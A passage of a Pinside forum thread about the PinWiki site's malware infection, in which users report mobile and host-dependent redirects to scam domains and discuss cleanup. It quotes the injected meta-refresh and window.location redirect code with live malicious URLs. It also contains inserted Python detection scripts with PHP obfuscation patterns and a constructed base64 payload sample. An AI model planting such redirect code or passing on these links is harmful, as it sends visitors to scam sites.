(Topic ID: 208300)

pinwiki - web hosting problem

By smiley

6 years ago


    There are 288 posts in this topic. You are on page 3 of 6.
    #101 4 years ago
    Quoted from PinWiz2180:

    Durzel, I was able to replicate based on your info you gave me earlier. I'm working on a few things related to it now.

    For what it’s worth you may well have already fixed it as I haven’t been able to reproduce it again with several browsers. I also ran it through some malware scanners too without problems.

    It could of course be dormant at the moment, the base64 point mentioned above is a good one. If it were me I’d be upgrading the wiki software to latest and running a file contents comparison against a known good directory tree.

    #102 4 years ago
    Quoted from ForceFlow:

    Try searching the php files for base64_encode() and base64_decode() functions. The last time I looked at an infected site, that's what was used to compact the malicious code and hide it with a similar browser agent detect function.
    [edit]: https://blog.resellerspanel.com/latest-news/how-to-quickly-fix-base64-infected-website.html

    Ooh, good find!
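A way to act on the base64 suggestion above, as an added example that is not code from the thread or from PinWiki: score PHP sources for the obfuscation and user-agent-detection patterns described, and decode literal base64_decode() arguments so the hidden text can be reviewed. The sample files, the payload text and the weights are constructed for illustration.

```python
import base64
import re

# Constructed sample PHP sources standing in for files pulled from a wiki tree.
# The "infected" one follows the pattern described in the thread: a user-agent
# check guarding a base64-packed payload. The payload text is invented here,
# not real malware, and the redirect host is a placeholder.
PAYLOAD_SRC = ('if (preg_match("/android|iphone/i", $_SERVER["HTTP_USER_AGENT"])) '
               '{ header("Location: http://redirect.example.invalid/"); }')
SAMPLE_FILES = {
    "LocalSettings.php": '<?php\n$wgSitename = "PinWiki";\n$wgDBtype = "mysql";\n',
    "includes/Setup.php": "<?php\n$token = base64_encode(random_bytes(16));\n",
    "cache/.x.php": '<?php\n@eval(base64_decode("'
                    + base64.b64encode(PAYLOAD_SRC.encode()).decode() + '"));\n',
}

# Each indicator carries a weight; a file's score is the sum of matched weights.
INDICATORS = [
    (r"\beval\s*\(", 3),
    (r"\bbase64_decode\s*\(", 2),
    (r"\b(?:gzinflate|gzuncompress|str_rot13)\s*\(", 2),
    (r"HTTP_USER_AGENT", 1),
    (r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", 3),   # deprecated /e modifier
    (r"\\x[0-9a-f]{2}\\x[0-9a-f]{2}", 1),              # hex-escaped string literal
]

B64_CALL_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decode_embedded_base64(source):
    """Decode literal arguments of base64_decode() found in a PHP source string."""
    decoded = []
    for literal in B64_CALL_RE.findall(source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue  # not valid base64; nothing to review
    return decoded


def score_php(source):
    """Return (score, matched_patterns) for one PHP source string."""
    score, matched = 0, []
    texts = [("", source)] + [("decoded:", t) for t in decode_embedded_base64(source)]
    # Indicators inside the decoded payload count too: packing hides them from a plain grep.
    for prefix, text in texts:
        for pattern, weight in INDICATORS:
            if re.search(pattern, text, re.IGNORECASE):
                score += weight
                matched.append(prefix + pattern)
    return score, matched


def triage(files, threshold=4):
    """Return {path: (score, matched)} for files scoring at or above threshold, highest first."""
    results = {path: score_php(src) for path, src in files.items()}
    flagged = {p: r for p, r in results.items() if r[0] >= threshold}
    return dict(sorted(flagged.items(), key=lambda kv: -kv[1][0]))
```

A real run would walk the wiki's PHP tree and feed each file's contents to `triage`; anything flagged is then compared by hash against the same file in a known-good copy of the wiki release.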

    #103 4 years ago
    Quoted from Durzel:

    What video? I haven’t posted a video...

    Sorry, sorry, I wasn't paying attention to the right post. Sorry.

    #104 4 years ago

    I think it may be squashed. No redirects here and I always get them.

    #105 4 years ago

    I *think* we have this squashed. Took a LOT of time reviewing files to make sure nothing was left over malicious. I can't find anything else lingering, and can't cause it to happen anymore. If anyone has it happen again, let me know immediately. Beefed up some security items while I was at it. Things seem to be back on track and running smooth. Appreciate the help from all. Especially on this one, as like I've said I struggled to replicate the problem for some reason on my daily setup, so getting detailed info from some of you guys helped me to SEE the problem.

    #106 4 years ago

    I just got hit. Safari. iphone SE

    #107 4 years ago

    Every time I go to this
    pinwiki.com › wiki › title=Bally › Stern_Electronics_Repair_Guides
    it takes me to this
    http://app6861.smmhck52.live/?utm_campaign=bKMuT7EMVXU5Z6UvvSHONGlfu-yV43iC8T8uYixAFxs1&t=main9_3c0f4108fe6b08fd&f=1

    I have to left click on the arrow to go to cached to open.
    It's been doing it for the past few days that I know about. Most other pages seem fine, it's just the Bally/Stern part.

    #108 4 years ago

    I am being redirected on mobile only right now.

    Desktop (windows 10, Chrome browser) is going straight to the wiki if I use pinwiki.com or www.pinwiki.com

    Mobile (android 9, Chrome browser is being redirected to the: http://app6861.smmhck52.live link. It is redirecting both www.pinwiki.com and pinwiki.com

    #109 4 years ago

    Yep, it was fixed for a bit, but now I'm getting redirected again

    #110 4 years ago

    Pinwiki.com Works for me, iPad using safari.

    #111 4 years ago

    I'm running OSX 10.13.6, and it appears to be working ok in Safari, but when I try to open the site in Firefox, I am getting redirected. This is even after I have cleared my cache.

    #112 4 years ago

    Windows 10, Firefox latest, redirected to a scam site :-/
    But it works fine with IE11.

    #113 4 years ago
    Quoted from hocuslocus:

    Every time I go to this
    pinwiki.com › wiki › title=Bally › Stern_Electronics_Repair_Guides
    it takes me to this
    http://app6861.smmhck52.live/?utm_campaign=bKMuT7EMVXU5Z6UvvSHONGlfu-yV43iC8T8uYixAFxs1&t=main9_3c0f4108fe6b08fd&f=1
    I have to left click on the arrow to go to cached to open.
    It's been doing it for the past few days that I know about. Most other pages seem fine, it's just the Bally/Stern part.

    Same... I was ok, until I clicked https://www.pinwiki.com/wiki/index.php?title=Bally/Stern while navigating from the main page...

    Looking at the payload... this is certainly all server side. My clean HTTP GET to GET /wiki/index.php?title=Bally/Stern HTTP/1.1

    returned a body with

    <META http-equiv="refresh" content="1;URL=http://apps4509.nonamesrv97.live/?utm_campaign=bKMuT7EMVXU5Z6UvvSHONGlfu-yV43iC8T8uYixAFxs1&t=main9_3c0f4108fe6b08fd">
    <script>
    window.location = "http://apps4509.nonamesrv97.live/?utm_campaign=bKMuT7EMVXU5Z6UvvSHONGlfu-yV43iC8T8uYixAFxs1&t=main9_3c0f4108fe6b08fd";
    </script>
    </head>

    So it has to be something in the server or php code. There isn't any malicious js being fed to the client to change the requests/etc.

    #114 4 years ago

    Just got malware on mobile.

    Let me know if you need a hand fixing it. I do this stuff for a living.

    #115 4 years ago
    Quoted from radium:

    Just got malware on mobile.
    Let me know if you need a hand fixing it. I do this stuff for a living.

    I sent him a PM yesterday offering my help as well but I haven't heard back yet. While I don't specifically do malware remediation I am a DevOps/Systems Engineer (yes I know devops isn't really a job title but the industry has decided otherwise)

    #116 4 years ago

    yep, pinwiki is still down.

    #117 4 years ago

    Yup I just hit it going to the homepage.

    #118 4 years ago

    Yeah the infection is back full blown. I couldn't even load the page I was going to. Just forwarded me every time. I couldn't see anything in the console in chrome on where the forward was happening. I'm not very familiar with that console though. I'll poke around with some more advanced tools today.

    #119 4 years ago

    Request:

    GET /wiki/index.php?title=Williams_System_9_-_11 HTTP/1.1
    Host: www.pinwiki.com
    Connection: close
    DNT: 1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
    Sec-Fetch-User: ?1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9

    Response:

    HTTP/1.1 200 OK
    Date: Mon, 11 Nov 2019 15:51:14 GMT
    Server: nginx/1.17.3
    Content-Type: text/html; charset=UTF-8
    Content-Length: 575
    Vary: Accept-Encoding
    X-Server-Cache: true
    X-Proxy-Cache: HIT

    <html>
    <head>
    <META http-equiv="refresh" content="1;URL=http://pinside.com">
    <script>
    window.location = "http://pinside.com";
    </script>
    </head>
    <body>
    To the new location please
    <b>click here.</b>
    </body>
    </html>

    I edited the URLs in the response so that I don't pollute Pinside with malware links. From the looks of how this is being done either the infection is in the MediaWiki code or perhaps within the webserver configuration.

    Additionally the fact that the infection seemed to slowly come back seems to indicate that perhaps there is a rootkit or other backdoor installed to allow access back to reinfect the site. I'm going to guess that the server was not nuked from orbit and data migrated. Really the best course of action when you're dealing with a known infection is to nuke it from orbit and start over.

    #120 4 years ago

    Still happening. Is anyone working to resolve this?

    #121 4 years ago

    I just clicked on a link that appeared for the system 11 page in google, and got redirected.

    #122 4 years ago

    Won’t go to pinwiki anymore as I always get redirected.

    #123 4 years ago

    On one of my computers I'm logged in, and I can get to Pinwiki. If not logged in, I can't get there.

    You can do a Google search and look at cached pages. The Wayback Machine (archive.org) probably also works, haven't checked though.

    I hope Casey is working on this. As of now the site is pretty much worthless.

    Edit: You can also get to the site if you block scripting.

    #124 4 years ago

    Is there anything we can do to pitch in and help clean this up?

    #125 4 years ago

    Multiple people have offered their assistance, myself included. That was over a week ago. I never heard back. He hasn't even shown up in the thread to acknowledge he's aware and working on it.

    #126 4 years ago

    For those of you trying to visit the site but still having problems: I've been viewing the pages I need using the Internet Archive Wayback Machine and then saving them as PDFs to my computer.

    #127 4 years ago

    Sorry, last 2 weeks I've had multiple personal emergencies come up, that have pulled me away from both PinWiki work as well as even making it on here to let you all know. Site is expected to be 100% inaccessible at some point this week as I seem to have found root cause of issue, but will require a full shut off of site for a day or two to get it taken care of. I appreciate the help offers (I have had 2 different cyber security/DevOps types offer to help). If I ran into another snafu after this go round, I will be in touch with you guys who offered.

    #128 4 years ago
    Quoted from PinWiz2180:

    Sorry, last 2 weeks I've had multiple personal emergencies come up, that have pulled me away from both PinWiki work as well as even making it on here to let you all know. Site is expected to be 100% inaccessible at some point this week as I seem to have found root cause of issue, but will require a full shut off of site for a day or two to get it taken care of. I appreciate the help offers (I have had 2 different cyber security/DevOps types offer to help). If I ran into another snafu after this go round, I will be in touch with you guys who offered.

    Good luck with the personal stuff. Pinwiki is a great resource for us, but take care of yourself first please!

    #129 4 years ago

    It appears the "Upload File" link has been removed. It must be temporarily disabled.

    #130 4 years ago

    Ken, I have uploads temporarily disabled, when I get things ironed out through this week, uploads will go back on. Sorry for the hassle.

    #131 4 years ago

    I have been adding information to the CAPCOM section today as well as correcting typos. As soon as the upload file feature is restored, I have some pictures to add to the Capcom section.

    #132 4 years ago
    Quoted from KenLayton:

    I have been adding information to the CAPCOM section today as well as correcting typos. As soon as the upload file feature is restored, I have some pictures to add to the Capcom section.

    Nice! I have a Capcom resetting issue that is not documented there yet.

    #133 4 years ago
    Quoted from PinWiz2180:

    Sorry, last 2 weeks I've had multiple personal emergencies come up, that have pulled me away from both PinWiki work as well as even making it on here to let you all know. Site is expected to be 100% inaccessible at some point this week as I seem to have found root cause of issue, but will require a full shut off of site for a day or two to get it taken care of. I appreciate the help offers (I have had 2 different cyber security/DevOps types offer to help). If I ran into another snafu after this go round, I will be in touch with you guys who offered.

    Thanks for your hard work! Pinwiki is an invaluable resource!!

    #134 4 years ago

    iPhone iOS 13.3

    Safari via pin wiki or google redirects for stern/bally link

    Chrome works

    Which I find odd as chrome on iOS is just a wrapper of safari

    1 week later
    #135 4 years ago

    I'm getting redirected and multiple pop ups when trying to access some parts of PinWiki.
    Samsung S10 using the Samsung browser.

    #136 4 years ago

    Same. Samsung S10 with chrome

    #137 4 years ago

    Yeah. Why is it the site is always hacked? Moto z force phone.

    How does this happen?

    #138 4 years ago
    Quoted from Friengineer:

    Yeah. Why is it the site is always hacked? Moto z force phone.
    How does this happen?

    Because Casey doesn’t fully understand what he is doing? He should have reached out for help a long time ago it sounds like from reading this thread.

    #139 4 years ago

    Bummer! Shame to lose this resource... Again. I better get to the Wayback machine.

    #140 4 years ago

    The annoying part is not knowing what sort of sh*t these sites have put on my phone.

    #141 4 years ago

    You can use archive.org’s “the Wayback Machine” to see point-in-time copies of many websites. Here’s a copy from March, which should be far enough back to avoid the cruft:

    https://web.archive.org/web/20180126191428/http://www.pinwiki.com/wiki/

    #142 4 years ago

    ... OOooor...
    just make sure the URL has "www." in front of the domain name.. I still use the site, just did this past weekend.

    #143 4 years ago
    Quoted from Coyote:

    ... OOooor...
    just make sure the URL has "www." in front of the domain name.. I still use the site, just did this past weekend.

    Doesn't always work for me

    #144 4 years ago
    Quoted from Coyote:

    ... OOooor...
    just make sure the URL has "www." in front of the domain name.. I still use the site, just did this past weekend.

    Ooooeeeee?
    That's a fine fix as well as the Wayback Machine but we are a couple of farts away from 2020. There is no reason why a website should act like it's 2002.

    No offense to anyone especially the owner of the site. I appreciate your work but how can the pinball community help? Is it a problem with the code? Let's redesign the site. I care more about the info than the wiki look.

    Is it the fact anyone can edit the site? Let's shut that function down and come up with a submission process.

    What is the problem and what radical change needs to be made? Fuck my phone beeping and flashing when I look at the Sys80 info!

    #145 4 years ago
    Quoted from Friengineer:

    That's a fine fix as well as the Wayback Machine but we are a couple of farts away from 2020. There is no reason why a website should act like it's 2002.

    I don't think that actually does anything. www or non-www doesn't seem to affect the malicious redirects. It might be based on the browser agent, referral, or cookie data, or some combination thereof.

    Quoted from Friengineer:

    Is it a problem with the code?

    I suspect there is malicious code embedded in some of the php files. It's a common method of infection and selective redirection so that some visitors get redirected and others do not. It's a way to stay hidden longer.

    These infections usually occur when there's a vulnerability in a website. Unfortunately, the wiki had not been updated in a while, so it's likely a malicious actor took advantage of an unpatched vulnerability and used that as a means to embed code into the site.

    The site was upgraded, and hopefully would have replaced the infected files, but this appeared not to be the case. So either there's still some infected files that were left in place (sometimes not all files need to be replaced during an upgrade), possibly some malicious code ended up in the database, possibly that malicious database code wrote itself back into the php files, or the site somehow got reinfected by other means.

    Without actually getting eyes on the source code or database, all I can do is speculate. It sounds like Casey received a few offers of help with cleaning out the infection--I'm not sure if that went anywhere yet or not since Casey's last post in the thread here.

    Quoted from Friengineer:

    Let's redesign the site. I care more about the info than the wiki look.

    A wiki is not a look. It's a type of website. It allows others to collaboratively edit the structure and content, and also logs the changes.

    Currently, a wiki is the best engine to use when multiple people are editing content on a single website, unlike with a blog where there is basically only one author.

    Quoted from Friengineer:

    Is it the fact anyone can edit the site? Let's shut that function down and come up with a submission process.

    No, only users with user accounts can edit, and those user accounts need to be approved manually.
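The selective-redirect behaviour discussed in this post, and the host-dependent responses reported elsewhere in the thread, can be checked without trusting any single browser. This is an added example, not code from the thread or from PinWiki: it parses served HTML for the meta-refresh and window.location pattern quoted above and flags targets pointing off the site's own domain, then reports which (Host, user-agent) variants were served one. The sample responses and the placeholder redirect domain are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample responses keyed by (Host header sent, user-agent family).
# The infected body follows the shape quoted in the thread; the redirect domain
# is a placeholder, not the real campaign host.
CLEAN_BODY = "<html><head><title>Bally/Stern</title></head><body>Repair guide</body></html>"
INFECTED_BODY = (
    '<html><head>'
    '<META http-equiv="refresh" content="1;URL=http://redirect.example.invalid/?utm_campaign=x">'
    '<script>window.location = "http://redirect.example.invalid/?utm_campaign=x";</script>'
    '</head><body>To the new location please <b>click here.</b></body></html>'
)
SAMPLE_RESPONSES = {
    ("www.pinwiki.com", "desktop"): CLEAN_BODY,
    ("www.pinwiki.com", "mobile"): INFECTED_BODY,
    ("pinwiki.com", "desktop"): INFECTED_BODY,
    ("pinwiki.com", "mobile"): INFECTED_BODY,
}


class RedirectFinder(HTMLParser):
    """Collects meta-refresh targets and location assignments inside inline scripts."""
    LOCATION_RE = re.compile(
        r"""(?:window|document|self|top)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")

    def __init__(self):
        super().__init__()
        self.targets = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):        # HTMLParser lowercases tag and attr names
        attrs = dict(attrs)
        if tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(.+)", attrs.get("content") or "", re.IGNORECASE)
            if m:
                self.targets.append(m.group(1).strip().strip("'\""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.targets.extend(self.LOCATION_RE.findall(data))


def injected_redirects(html, site_host):
    """Return redirect targets whose host is neither the site nor one of its subdomains."""
    finder = RedirectFinder()
    finder.feed(html)
    own = site_host.lower()
    own = own[4:] if own.startswith("www.") else own
    hits = []
    for url in finder.targets:
        host = (urlparse(url).hostname or "").lower()
        if host and host != own and not host.endswith("." + own):
            hits.append(url)
    return hits


def variants_serving_redirect(responses, site_host):
    """Map each (host, agent) variant that carried an off-site redirect to its targets."""
    found = {}
    for key, body in responses.items():
        hits = injected_redirects(body, site_host)
        if hits:
            found[key] = hits
    return found
```

Against a live server the bodies would come from raw requests sent with different Host headers and user agents, bypassing the browser cache, which is the same comparison the Wireshark observation in this thread relies on.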

    #146 4 years ago

    Sounds like they need to wipe the server and put a fresh wiki on, then import the old pages again or something.

    #147 4 years ago
    Quoted from zacaj:

    Sounds like they need to wipe the server and put a fresh wiki on, then import the old pages again or something.

    You would still need to go through the database, uploaded files, config files, template files, etc

    It's not quite as simple as that if you also want to retain all the data and avoid inadvertently copying over malicious code, which might be what happened during the upgrade.

    #148 4 years ago
    Quoted from ForceFlow:

    I don't think that actually does anything. www or non-www doesn't seem to affect the malicious redirects. It might be based on the browser agent, referral, or cookie data, or some combination thereof.

    As I've stated before, looking at the communication between client and server (being a web developer (NOT 'designer'), I have the tools), and no matter what page I hit, if the server name is "pinwiki.com", the HTML returned has a meta refresh pointing to a bad URL, and a <script> tag with a location.refresh to the malicious URL.

    Whereas the "www.pinwiki.com" does not. These are not cached, I'm looking at the raw data transfer using Wireshark.

    Honestly, y'all can do what you want - use the Wayback Machine, whatever. I've offered help numerous times to them, and never heard back. For when I need it, I just add the 'www'. It's a much easier process for me than going to a DIFFERENT website (archive) and typing in the name of the site.

    #149 4 years ago
    Quoted from Coyote:

    As I've stated before, looking at the communication between client and server (being a web developer (NOT 'designer'), I have the tools), and no matter what page I hit, if the server name is "pinwiki.com", the HTML returned has a meta refresh pointing to a bad URL, and a <script> tag with a location.refresh to the malicious URL.
    Whereas the "www.pinwiki.com" does not. These are not cached, I'm looking at the raw data transfer using Wireshark.

    Shhhh..... Speculation is always better than facts!

    For people that are offering to help, go ahead and set up an unofficial mirror. And be sure to strip out the malicious code as you do it.

    #150 4 years ago
    Quoted from slochar:

    Shhhh..... Speculation is always better than facts!
    For people that are offering to help, go ahead and set up an unofficial mirror. And be sure to strip out the malicious code as you do it.

    "You may not, except with express written permission, distribute or commercially exploit the PinWiki.com content. Nor may you transmit it or store it in any other website or other form of electronic retrieval system." (from https://www.pinwiki.com/wiki/index.php?title=PinWiki:Copyrights)

    This page was printed from https://pinside.com/pinball/forum/topic/pinwiki-1/page/3?hl=gott_lieb and we tried optimising it for printing. Some page elements may have been deliberately hidden.

    Scan the QR code on the left to jump to the URL this document was printed from.